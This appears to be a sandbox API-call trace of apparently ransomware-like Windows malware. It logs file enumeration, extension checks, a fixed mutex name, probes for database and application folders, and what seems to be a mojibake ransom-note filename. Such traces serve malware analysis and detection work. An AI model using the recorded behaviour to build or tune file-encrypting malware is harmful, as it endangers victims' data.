CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL 
Server Compact Edition\\v3.5\\sqlceqp35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.110] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceqp35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.110] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0104.110] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.110] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.110] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.110] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.110] GlobalUnlock (hMem=0x45000c) returned 0 [0104.110] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.110] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.110] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.110] GlobalUnlock (hMem=0x45000c) returned 0 [0104.110] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.110] GlobalUnlock (hMem=0x450004) returned 0 [0104.110] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.111] CharLowerBuffW (in: lpsz="sqlcese35.dll", cchLength=0xd | out: lpsz="sqlcese35.dll") 
returned 0xd [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) 
returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.112] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.112] WideCharToMultiByte 
(in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlcese35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.112] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0104.112] GetLastError () returned 0x12 [0104.112] FindClose (in: hFindFile=0x575030 | out: hFindFile=0x575030) returned 1 [0104.113] GlobalLock (hMem=0x450004) returned 0x588000 [0104.113] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.113] GlobalUnlock (hMem=0x450004) returned 0 [0104.113] GlobalLock (hMem=0x450004) returned 0x588000 [0104.113] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.113] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.113] GlobalUnlock (hMem=0x450004) returned 0 [0104.113] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.113] GlobalUnlock (hMem=0x45000c) returned 0 [0104.113] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*", lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575030 [0104.115] 
FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f114 | out: lpLocalFileTime=0x18f114) returned 1 [0104.115] FileTimeToDosDateTime (in: lpFileTime=0x18f114, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.115] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.115] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.115] GlobalUnlock (hMem=0x45000c) returned 0 [0104.115] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.116] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.116] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.116] GlobalUnlock (hMem=0x45000c) returned 0 [0104.116] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.116] GlobalUnlock (hMem=0x450004) returned 0 [0104.116] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.116] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.116] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.116] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.116] GlobalLock (hMem=0x450004) returned 0x588000 [0104.116] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.116] GlobalUnlock (hMem=0x450004) returned 0 [0104.116] GlobalLock (hMem=0x450004) returned 0x588000 [0104.116] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.116] GlobalHandle 
(pMem=0x588000) returned 0x450004 [0104.116] GlobalUnlock (hMem=0x450004) returned 0 [0104.116] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.116] GlobalUnlock (hMem=0x45000c) returned 0 [0104.116] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.117] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0104.117] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.117] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.117] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.117] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.117] GlobalUnlock (hMem=0x45000c) returned 0 [0104.117] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.117] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.117] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.117] GlobalUnlock (hMem=0x45000c) returned 0 [0104.117] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.117] GlobalUnlock (hMem=0x450004) returned 0 [0104.117] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.117] GlobalLock (hMem=0x450004) returned 0x588000 [0104.117] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.117] GlobalUnlock (hMem=0x450004) returned 0 [0104.117] GlobalLock (hMem=0x450004) returned 0x588000 [0104.117] GlobalLock (hMem=0x45000c) 
returned 0x58a010 [0104.118] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.118] GlobalUnlock (hMem=0x450004) returned 0 [0104.118] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.118] GlobalUnlock (hMem=0x45000c) returned 0 [0104.118] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.118] SysReAllocStringLen (in: pbstr=0x18f110*=0x0, psz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop", len=0x42 | out: pbstr=0x18f110*="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop") returned 1 [0104.118] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.118] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.118] GlobalUnlock (hMem=0x45000c) returned 0 [0104.118] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.118] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.118] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.118] GlobalUnlock (hMem=0x45000c) returned 0 [0104.118] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.118] GlobalUnlock (hMem=0x450004) returned 0 [0104.118] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Microsoft\\Exchange Server", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@嗎X喢X企@\x18㸼V\x18\x1b")) returned 0xffffffff [0104.119] GetLastError () returned 0x3 [0104.119] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact 
edition\\v3.5\\desktop\\") returned 0x43 [0104.119] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.119] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=21, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\犈X\x01") returned 21 [0104.119] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Microsoft SQL Server", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18긴V\x181")) returned 0xffffffff [0104.122] GetLastError () returned 0x2 [0104.122] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=9, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\犈X\x01") returned 9 [0104.122] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Firebird", lpFindFileData=0x18eb8c | out: 
lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@嗤X企@\x18㟄X\x18;")) returned 0xffffffff [0104.122] GetLastError () returned 0x2 [0104.123] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=8, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\犈X\x01") returned 8 [0104.123] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\MSSQL.1", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18D")) returned 0xffffffff [0104.123] GetLastError () returned 0x2 [0104.123] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql 
server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=37, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0104.124] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@嗤X企@\x18召X\x18j")) returned 0xffffffff [0104.124] GetLastError () returned 0x2 [0104.124] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0104.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0104.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact 
Edition\\v3.5\\Desktop\\Adobe", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@坴X企@\x18㟄X\x18q")) returned 0xffffffff [0104.125] GetLastError () returned 0x2 [0104.125] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="adobe\\叨XP") returned 6 [0104.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0104.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Oracle", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18y")) returned 0xffffffff [0104.126] GetLastError () returned 0x2 [0104.126] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", 
cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0104.126] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Archive", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, 